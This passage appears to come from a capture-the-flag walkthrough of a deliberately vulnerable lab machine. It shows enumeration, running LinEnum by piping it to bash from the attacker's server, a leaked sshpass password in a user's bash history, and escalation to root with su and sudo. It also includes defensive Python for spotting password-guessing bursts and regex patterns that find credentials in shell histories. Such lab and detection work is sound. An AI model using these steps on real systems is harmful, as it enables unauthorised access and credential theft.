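    only meaningful within one log file (strptime fills in 1900)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),
            "result": m.group("result"),
            "user": m.group("user"),
            "ip": m.group("ip"),
        })
    return events


def detect_password_guessing(events, threshold: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Report source IPs with >= threshold failures inside any window_s-second window.

    Each report entry holds the peak failure count in a window, how many distinct
    usernames were tried, and the username of any success that followed a burst.
    """
    window = timedelta(seconds=window_s)
    recent_failures = defaultdict(list)   # ip -> failure timestamps still inside the window
    users_tried = defaultdict(set)
    report: Dict[str, dict] = {}

    def entry(ip: str) -> dict:
        return report.setdefault(ip, {"failures": 0, "distinct_users": 0, "success_after_burst": None})

    for ev in sorted(events, key=lambda e: e["ts"]):
        ip = ev["ip"]
        recent = [t for t in recent_failures[ip] if ev["ts"] - t <= window]  # age out old failures
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            users_tried[ip].add(ev["user"])
            if len(recent) >= threshold:
                e = entry(ip)
                e["failures"] = max(e["failures"], len(recent))
                e["distinct_users"] = len(users_tried[ip])
        elif len(recent) >= threshold:
            # A success right after a burst of failures is the event worth paging on.
            entry(ip)["success_after_burst"] = ev["user"]
        recent_failures[ip] = recent
    return report


if __name__ == "__main__":
    for ip, info in detect_password_guessing(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On the sample, 192.168.50.135 is reported with six failures across six usernames and a `success_after_burst` of SHayslett, while the single failure from 192.168.50.20 stays below the threshold. The same sliding-window logic is what tools like fail2ban apply before banning a source; the success-after-burst flag is the part that turns a noisy alert into an incident.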
EoP
SHayslett@red:~$ ls -lah /home
total 128K
drwxr-xr-x 32 root       root       4.0K Jun  4  2016 .
drwxr-xr-x 22 root       root       4.0K Jun  7  2016 ..
drwxr-xr-x  2 AParnell   AParnell   4.0K Jun  5  2016 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4.0K Jun  5  2016 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4.0K Jun  5  2016 CJoo
drwxr-xr-x  2 Drew       Drew       4.0K Jun  5  2016 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4.0K Jun  5  2016 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4.0K Jun  5  2016 Eeth
drwxr-xr-x  2 elly       elly       4.0K Jun  5  2016 elly
drwxr-xr-x  2 ETollefson ETollefson 4.0K Jun  5  2016 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4.0K Jun  5  2016 IChadwick
drwxr-xr-x  2 jamie      jamie      4.0K Jun  5  2016 jamie
drwxr-xr-x  2 JBare      JBare      4.0K Jun  5  2016 JBare
drwxr-xr-x  2 jess       jess       4.0K Jun  5  2016 jess
drwxr-xr-x  2 JKanode    JKanode    4.0K Jun  5  2016 JKanode
drwxr-xr-x  2 JLipps     JLipps     4.0K Jun  5  2016 JLipps
drwxr-xr-x  2 kai        kai        4.0K Jun  5  2016 kai
drwxr-xr-x  2 LSolum     LSolum     4.0K Jun  5  2016 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4.0K Jun  5  2016 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4.0K Jun  5  2016 MBassin
drwxr-xr-x  2 mel        mel        4.0K Jun  5  2016 mel
drwxr-xr-x  2 MFrei      MFrei      4.0K Jun  5  2016 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4.0K Jun  5  2016 NATHAN
drwxr-xr-x  3 peter      peter      4.0K Jun  3  2016 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4.0K Jun  5  2016 RNunemaker
drwxr-xr-x  2 Sam        Sam        4.0K Jun  5  2016 Sam
drwxr-xr-x  2 SHAY       SHAY       4.0K Jun  5  2016 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4.0K May 31 10:39 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4.0K Jun  5  2016 SStroud
drwxr-xr-x  2 Taylor     Taylor     4.0K Jun  5  2016 Taylor
drwxrwxrwx  2 www        www        4.0K Jun  5  2016 www
drwxr-xr-x  2 zoe        zoe        4.0K Jun  5  2016 zoe
Let’s start with some basic enumeration.
I start a Python HTTP server on port 80 from the folder containing a recon bash script (LinEnum).

root@redteam:/opt/tools/shells/LinEnum# server 80
Serving HTTP on 0.0.0.0 port 80 ...
Then curling it on the remote system and piping it to bash.
This way the script will run on the remote system without the need to transfer the file first.
...[SNIP]...
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
...[SNIP]...
[-] Accounts that have recently used sudo:
/home/peter/.sudo_as_admin_successful
...[SNIP]...
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit

It looks like Peter is the user of interest, and from JKanode's bash history it looks like I have his password.
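World-readable shell history holding `sshpass -p` lines is the root cause here, and it is something an administrator can sweep for before anyone else does. As an added example (my code, not from the original post or from LinEnum), the following Python scans history contents for the common ways a password ends up on a command line (`sshpass -p`, an inline `mysql -p<pw>`, `--password=`, `curl -u user:pass`, and `PASSWORD=`-style assignments) and reports file, line number and a redacted hint so the owner knows which secret to rotate without the report itself becoming a second leak. The histories below are constructed and modelled on the JKanode history above; the paths, commands and secrets are made up.

```python
import re
from typing import Dict, Iterable, List

# Constructed shell-history contents, modelled on the JKanode history quoted above.
# Paths, commands and secrets are invented for this example.
SAMPLE_HISTORIES: Dict[str, str] = {
    "/home/JKanode/.bash_history": (
        "id\n"
        "whoami\n"
        "sshpass -p Wint3rIsC0ming ssh JKanode@localhost\n"
        "apt-get install sshpass\n"
        "sshpass -p n0tTh3R3alOne peter@localhost\n"
        "exit\n"
    ),
    "/home/www/.bash_history": (
        "mysql -u root -pS3cretDB wordpress\n"
        "curl -u admin:hunter2 https://localhost:12380/\n"
        "export DB_PASSWORD=abc123\n"
        "ls -la\n"
    ),
}

# (label, pattern); group 1 captures the secret so it can be redacted in the report.
PATTERNS = [
    ("sshpass", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql-inline", re.compile(r"\bmysql\b.*?\s-p(\S+)")),          # "-p<pw>" only, not a bare "-p" prompt
    ("password-flag", re.compile(r"--password=(\S+)")),
    ("curl-basic-auth", re.compile(r"\bcurl\b.*?\s-u\s*\S+?:(\S+)")),
    ("env-assignment", re.compile(r"\b\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=(\S+)", re.I)),
]


def redact(secret: str) -> str:
    """Keep a two-character hint so the owner can tell which secret leaked."""
    return secret[:2] + "*" * max(3, len(secret) - 2)


def scan_history_text(path: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per history line that matches a credential pattern."""
    findings: List[Dict[str, object]] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({"file": path, "line": line_no, "tool": label, "hint": redact(m.group(1))})
                break  # one finding per line is enough for triage
    return findings


def scan_histories(histories: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan an in-memory {path: contents} mapping (used by the sample and the test)."""
    findings: List[Dict[str, object]] = []
    for path, text in histories.items():
        findings.extend(scan_history_text(path, text))
    return findings


def scan_history_files(paths: Iterable[str]) -> List[Dict[str, object]]:
    """Same scan over real files on disk (e.g. /home/*/.bash_history); unreadable files are skipped."""
    histories: Dict[str, str] = {}
    for p in paths:
        try:
            with open(p, encoding="utf-8", errors="replace") as fh:
                histories[p] = fh.read()
        except OSError:
            continue
    return scan_histories(histories)


if __name__ == "__main__":
    for f in scan_histories(SAMPLE_HISTORIES):
        print(f"{f['file']}:{f['line']}  {f['tool']:16} {f['hint']}")
```

The sample produces five findings: two `sshpass` hits in the JKanode history and one each of `mysql-inline`, `curl-basic-auth` and `env-assignment` in the other file. The fix on the host side is the usual one: rotate every secret found, and stop passwords reaching argv in the first place (key-based SSH, `mysql --defaults-extra-file`, `.netrc` or a credential helper for curl), since argv is also visible in `ps` while the command runs.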
JKanode@red:~$ su peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- (
Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% pwd
/home/JKanode
red% cd
red% pwd
/home/peter
red% ls -lah
total 72K
drwxr-xr-x  3 peter peter 4.0K Jun  3  2016 .
drwxr-xr-x 32 root  root  4.0K Jun  4  2016 ..
-rw-------  1 peter peter    1 Jun  5  2016 .bash_history
-rw-r--r--  1 peter peter  220 Jun  3  2016 .bash_logout
-rw-r--r--  1 peter peter 3.7K Jun  3  2016 .bashrc
drwx------  2 peter peter 4.0K Jun  6  2016 .cache
-rw-r--r--  1 peter peter  675 Jun  3  2016 .profile
-rw-r--r--  1 peter peter    0 Jun  3  2016 .sudo_as_admin_successful
-rw-------  1 peter peter  577 Jun  3  2016 .viminfo
-rw-rw-r--  1 peter peter  39K Jun  3  2016 .zcompdump
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red%
Well….that’s nice.
red% sudo -i
➜  ~ pwd
/root
➜  ~ id
uid=0(root) gid=0(root) groups=0(root)
➜  ~ ls -lah
total 208K
drwx------  4 root root 4.0K May 31 11:19 .
drwxr-xr-x 22 root root 4.0K Jun  7  2016 ..
-rw-------  1 root root    1 Jun  5  2016 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root 1.1K Jun  5  2016 fix-wordpress.sh
-rw-r--r--  1 root root  463 Jun  5  2016 flag.txt
-rw-r--r--  1 root root  345 Jun  5  2016 issue
-rw-r--r--  1 root root   50 Jun  3  2016 .my.cnf
-rw-------  1 root root    1 Jun  5  2016 .mysql_history
drwxr-xr-x 11 root root 4.0K Jun  3  2016 .oh-my-zsh
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root  103 Jun  5  2016 python.sh
-rw-------  1 root root 1.0K Jun  5  2016 .rnd
drwxr-xr-x  2 root root 4.0K Jun  4  2016 .vim
-rw-------  1 root root    1 Jun  5  2016 .viminfo
-rw-r--r--  1 root root  54K Jun  5  2016 wordpress.sql
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump-red-5.1.1
-rw-------  1 root root   39 Jun  5  2016 .zsh_history
-rw-r--r--  1 root root 2.8K Jun  3  2016 .zshrc
-rw-r--r--  1 root root   17 Jun  3  2016 .zsh-update
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O   o )--.-"`O   o"-.`'-----'`
 '--------'  (   o   O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
And that’s the flag.
Conclusion
This was definitely good practice in working your way through a system step by step.
Given the many possibilities this challenge offered to get access, I found it odd that there were so many rabbit holes that turned out to be nothing, and that in the end a simple SSH brute force did the trick.
To compare notes I read a few walkthroughs by others who did the same challenge, and some had different outcomes, for example with WordPress:
uploading the plugin was no problem for them and there was no mention of FTP credentials.
Anyhow, I really liked this challenge and I would recommend it to anyone trying to learn more about pentesting.